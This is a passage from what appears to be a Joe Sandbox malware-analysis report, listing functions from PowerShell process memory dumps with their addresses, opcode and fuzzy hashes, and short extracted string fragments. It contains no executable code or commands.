                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab3fba7bc1f901090fa2465fe9cfec19f881717586df123203f61327028c172f
                                                  • Instruction ID: 1ba70c3797ef47897bbd3e62ed54e945a7ba0440d0ad4e2a3fec5700d0ead4de
                                                  • Opcode Fuzzy Hash: ab3fba7bc1f901090fa2465fe9cfec19f881717586df123203f61327028c172f
                                                  • Instruction Fuzzy Hash: 35210671604304DFDF05DF10D9C4B26BBA5FB88314F24C5AEE9498E296C736E856CBA1
                                                  Function 0A337982 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62e768b66a4f1fb9085ad39b0a391f93c2cc30af64b2b6d2b1df55fdd39d74c6
                                                  • Instruction ID: 362c6459a188867921e572cb5eb4ae83a7f56a9a6fe6fed408128b8b76b853cf
                                                  • Opcode Fuzzy Hash: 62e768b66a4f1fb9085ad39b0a391f93c2cc30af64b2b6d2b1df55fdd39d74c6
                                                  • Instruction Fuzzy Hash: 73113AB4A042099FCB00DF98D4819AEFBF1FF89310B158199E819EB351C335ED41CBA1
                                                  Function 04D9EEA3 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2af9c9ea477a083af87f96385403baa4e5001dbd8c9e6086a07978c3fca66d4
                                                  • Instruction ID: 95ff3da7c832d7023d00a673a602d8f5ed0c36c77c6c2722a62b156bc27d75b9
                                                  • Opcode Fuzzy Hash: a2af9c9ea477a083af87f96385403baa4e5001dbd8c9e6086a07978c3fca66d4
                                                  • Instruction Fuzzy Hash: BF219D76504240DFCF06CF50D9C4B16BFA2FB48314F24C5AAE9494A696C33AE86ACF91
                                                  Function 04D9D01D Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d7677375a9254a45a86de37ea65dbf1821a38bf135973af334e5ff378a5e33f
                                                  • Instruction ID: cf235195f8e4672e0c782a41a20e409f7b4e0650e370c109e99778cfb458731c
                                                  • Opcode Fuzzy Hash: 8d7677375a9254a45a86de37ea65dbf1821a38bf135973af334e5ff378a5e33f
                                                  • Instruction Fuzzy Hash: 8701D431604304AAEB204A11EC84B66BFC9EB41225F18C519DC4C8B282D679AC46CAB1
                                                  Function 04D9D005 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5b8491a57e4c9a7ad76a58a50fd8ea5155a6ac4b287821004bfd9f3481d60f5
                                                  • Instruction ID: 1547902d92a2d89c7eadf5af6152a13045cf88045da2a8500cb9d41c54016cbd
                                                  • Opcode Fuzzy Hash: d5b8491a57e4c9a7ad76a58a50fd8ea5155a6ac4b287821004bfd9f3481d60f5
                                                  • Instruction Fuzzy Hash: 2B015E6114E3C09FD7128B259C94B52BFB4EF43224F19C1DBD8888F2A3C2699C49CB72
                                                  Function 0530DC10 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8227332d9d9f65ebe66906cfa949722d28dded2eac61bb38c257f9ee77a962e0
                                                  • Instruction ID: f097ad6ff30c710cd7a4c6918547d6f3ea6165bb4d3de726acaf044e3e28d66c
                                                  • Opcode Fuzzy Hash: 8227332d9d9f65ebe66906cfa949722d28dded2eac61bb38c257f9ee77a962e0
                                                  • Instruction Fuzzy Hash: 3601D6397101148FC746B738A12857D7BA3DFC9655716456EE807C7782DF788D038B51
                                                  Function 0530F850 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbe04dc4c329e61e2e1382e79bbe53515cd134268a369c624832c69f0b4e99b3
                                                  • Instruction ID: 85850a6af842434209a131b7d3ddeb62de618107ca18082be76b03f95a1ebb08
                                                  • Opcode Fuzzy Hash: fbe04dc4c329e61e2e1382e79bbe53515cd134268a369c624832c69f0b4e99b3
                                                  • Instruction Fuzzy Hash: C6F0F0357043005BDF246A69A42466F77ABFBC9221B04463ED40ECB380EF71AC8A83D2
                                                  Function 0530F840 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6baad68f4722f0e738ed48d95b481aa6ad9ea1011619f74e683e2aac267fdcbd
                                                  • Instruction ID: 6a84cac0d630c76349defbcb6e15d7b4269f1b1d0e58e5f718273b405eb38cbe
                                                  • Opcode Fuzzy Hash: 6baad68f4722f0e738ed48d95b481aa6ad9ea1011619f74e683e2aac267fdcbd
                                                  • Instruction Fuzzy Hash: 43F027367093500FDB22527D60545EE7F66EBCA220308027FD00ECB782DA615D4A83A2
                                                  Function 0530DC20 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc3967e2283ac672e253c70281c00953a23968536da7c61b0faa3d8ae0e89c91
                                                  • Instruction ID: fd611ab405e6ed209eeeec067f35f0220f16315ed809eb503adc89770951933b
                                                  • Opcode Fuzzy Hash: bc3967e2283ac672e253c70281c00953a23968536da7c61b0faa3d8ae0e89c91
                                                  • Instruction Fuzzy Hash: 63F030397105189F8749BB38A26843E77E7EFCC666316442EE90BC7381DF749E028B91
                                                  Function 0530F8BC Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 674430c9c5a9afdd0e9ff65fe3424393a97367cd9ba659eff039ae744214d6cb
                                                  • Instruction ID: 2f875ee044c6d7aaab66741f5894c5fa1a920ec510f0df2f38ef6d02757b5068
                                                  • Opcode Fuzzy Hash: 674430c9c5a9afdd0e9ff65fe3424393a97367cd9ba659eff039ae744214d6cb
                                                  • Instruction Fuzzy Hash: DEF09E3670C3504FDB266B3454281AE7F53FBDA151704007FC046CB1A1EA55D74783D1
                                                  Function 0530FE90 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f5c5367418afb2b34861757fef96a231fa7e123ec284f2f3d9f104a27e51438
                                                  • Instruction ID: b344fa7d87e08980e65588cf7f56719660517893d1471ee5631bfffd56505a0a
                                                  • Opcode Fuzzy Hash: 9f5c5367418afb2b34861757fef96a231fa7e123ec284f2f3d9f104a27e51438
                                                  • Instruction Fuzzy Hash: 59E01A34C1014A9BCB2CEF70D8575AEBF74FB14301F9081AEDD27926A4EA71155ACF82
                                                  Function 0A33D1F8 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 95dd205dc60a6465a834a02cebbc9df0bbfdef7cf0e73cc97ca10f9886b3d703
                                                  • Instruction ID: 7447765b89ee43b7c2ce8fb77a4dd6cc065ba9363992dd5e72decae293b25d08
                                                  • Opcode Fuzzy Hash: 95dd205dc60a6465a834a02cebbc9df0bbfdef7cf0e73cc97ca10f9886b3d703
                                                  • Instruction Fuzzy Hash: 69E026B5D1820E9F8F88EFB995421BEFBF5AB48200F10896F9819E3340E63456118F95
                                                  Function 0A33D2C8 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 360aae616d6193b6572b1956621f9f95c1fb683dd95e7ab15686f32a2f645a3a
                                                  • Instruction ID: be223886cd5c6faeaa9e649cda59f2490619937732fa56838fe10a6810a37416
                                                  • Opcode Fuzzy Hash: 360aae616d6193b6572b1956621f9f95c1fb683dd95e7ab15686f32a2f645a3a
                                                  • Instruction Fuzzy Hash: 71D05E352101209FC705AB68E548C4A7BAAEB4D6547114191E909C7362CA71EC008BE1
                                                  Function 0A33E470 Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d864cc313016e4fdc3859cb792444a56c6c0e5ddd289f7a0538b56776120e2f
                                                  • Instruction ID: d42127ffb2fe5cfa1c68f8568c6aaecab30a1a234ba12033cc77a5162c9318a3
                                                  • Opcode Fuzzy Hash: 6d864cc313016e4fdc3859cb792444a56c6c0e5ddd289f7a0538b56776120e2f
                                                  • Instruction Fuzzy Hash: 0DD0123180500ADBCB48AB94F81A4FE7B7CAB00305F40405DE91792190DB301D5ACA80
                                                  Function 0530FEA0 Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d548ad5c0425e312511aff10c0729316efcd1acaf0e802b8be432f97f7ef8ccd
                                                  • Instruction ID: 16ba6309c21972e6408498c019edc4c9fc5c20442d31880e40965cbd89b34137
                                                  • Opcode Fuzzy Hash: d548ad5c0425e312511aff10c0729316efcd1acaf0e802b8be432f97f7ef8ccd
                                                  • Instruction Fuzzy Hash: 9AD0673480414A8BCB2CEBA4E85A5BDBB38FA10205F804169DA1753695AA702A5ACA92

                                                  Non-executed Functions

                                                  Function 07B71810 Relevance: 12.8, Strings: 10, Instructions: 325COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q$l$l
                                                  • API String ID: 0-1821798344
                                                  • Opcode ID: bde4f26908be0610b26edcdf50a4189e6eba544b8973ee5be2858a786af8981f
                                                  • Instruction ID: eb3dca4b4c4bfe4ce4b5379ab230ee4cda24af4bb2e867577f8a7d5351858739
                                                  • Opcode Fuzzy Hash: bde4f26908be0610b26edcdf50a4189e6eba544b8973ee5be2858a786af8981f
                                                  • Instruction Fuzzy Hash: DCA139F170431E8FE7258A6D941166ABBA6DFC6211F1880FBD965CB391DA31CC42C3B1
                                                  Function 07B75358 Relevance: 11.7, Strings: 9, Instructions: 451COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$_$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-572712508
                                                  • Opcode ID: 17db6bf8bf8f1c995ec49d1bb42c5efa7fecd4c373d95baa0333806a38acdf93
                                                  • Instruction ID: 3a0a18a64895d69a3435eeec16f34af21e0bf6330ae68e9b426cb9b1e928b902
                                                  • Opcode Fuzzy Hash: 17db6bf8bf8f1c995ec49d1bb42c5efa7fecd4c373d95baa0333806a38acdf93
                                                  • Instruction Fuzzy Hash: 68E13DF1B04306DFEB348B69D4456AAFBF1EF85211F2480BAD825CB251EB31D961C791
                                                  Function 07B72458 Relevance: 9.0, Strings: 7, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q$l$l
                                                  • API String ID: 0-3535909460
                                                  • Opcode ID: 11742dfcaeb48a22de15da703bdd9d537bdef5e5796a7af651de700aed5cec5a
                                                  • Instruction ID: 0f755fdc352e7e2ddfd3e429aca6961a8a48e29e3ff5415065e863bcb7b1b7ac
                                                  • Opcode Fuzzy Hash: 11742dfcaeb48a22de15da703bdd9d537bdef5e5796a7af651de700aed5cec5a
                                                  • Instruction Fuzzy Hash: 56514CF1B002068FFB345A6998257E6BBB2FFC5711F1880BBD965C7241DA31C942C7A1
                                                  Function 07B74E10 Relevance: 7.9, Strings: 6, Instructions: 371COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$tPq$tPq
                                                  • API String ID: 0-3271992745
                                                  • Opcode ID: ed861bb16880ac398f33b6d4e8b4718038e32eeed20f331fc301466f105bcdab
                                                  • Instruction ID: 8a12f161af4118400cbe2c42bf1955d55fe3c581ef30052c74d1b854aafd2ece
                                                  • Opcode Fuzzy Hash: ed861bb16880ac398f33b6d4e8b4718038e32eeed20f331fc301466f105bcdab
                                                  • Instruction Fuzzy Hash: B1C14AF1B043468FE7258A299411666FBF2EFC6222F1980FBD459CB251DA31DC52C7D1
                                                  Function 07B706B0 Relevance: 7.8, Strings: 6, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$$q$$q
                                                  • API String ID: 0-448788557
                                                  • Opcode ID: 12a9df4899c4a648b4cb38cc3170ce2e69168eb4c7b59fffc950064dffcc4657
                                                  • Instruction ID: a09e31e516ffe432b7e6a920e3cb712d8dfab4ab8dfd4a9ffc9c4b8c5307a9f4
                                                  • Opcode Fuzzy Hash: 12a9df4899c4a648b4cb38cc3170ce2e69168eb4c7b59fffc950064dffcc4657
                                                  • Instruction Fuzzy Hash: 73915CF1B043468FE725662898143AABFA2DFC6211F1880FBD555CF282EA31DC41C7E2
                                                  Function 07B74260 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: w3$tPq$tPq$$q
                                                  • API String ID: 0-3343979535
                                                  • Opcode ID: 732bacf41513364e9a471029f4ef7fc960914bab081cb58193b310c49f1a51d0
                                                  • Instruction ID: 17ef5713fa9692ace09d21e47a8925287a2226bc01e3ec43eb221a1465d3824f
                                                  • Opcode Fuzzy Hash: 732bacf41513364e9a471029f4ef7fc960914bab081cb58193b310c49f1a51d0
                                                  • Instruction Fuzzy Hash: 92316EF1B003859FFB249B55840576AF7F6EF85352F1580BAD5299F280DE70C841C3A1
                                                  Function 07B744A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: 1a5f933cf9bf9a81095ac945b7fc3891c201471d763e2a4089f9598d4b4537cd
                                                  • Instruction ID: 72d5b10359663f7ee3606f4b4a9130cb9e30267cabea2e28912c3ad15deb55b7
                                                  • Opcode Fuzzy Hash: 1a5f933cf9bf9a81095ac945b7fc3891c201471d763e2a4089f9598d4b4537cd
                                                  • Instruction Fuzzy Hash: A42147F13103825BFB34566AA811737BB9AEBC2726F64847AAD25CB381DD31C841C361
                                                  Function 07B7030B Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q
                                                  • API String ID: 0-3199993180
                                                  • Opcode ID: 6a048e020019676c683e7d4841b7996d8b408ce1d8d0cdf6adab937d49965db5
                                                  • Instruction ID: bc168ea95fba9d417f60d89141a3940e1d62bd7d80e3d9bf5e3a0eca5947c022
                                                  • Opcode Fuzzy Hash: 6a048e020019676c683e7d4841b7996d8b408ce1d8d0cdf6adab937d49965db5
                                                  • Instruction Fuzzy Hash: 0A01A2A170D3C24FE72B222828201952FB29F8751072F40E7D4A1CF393C9144C06C3B7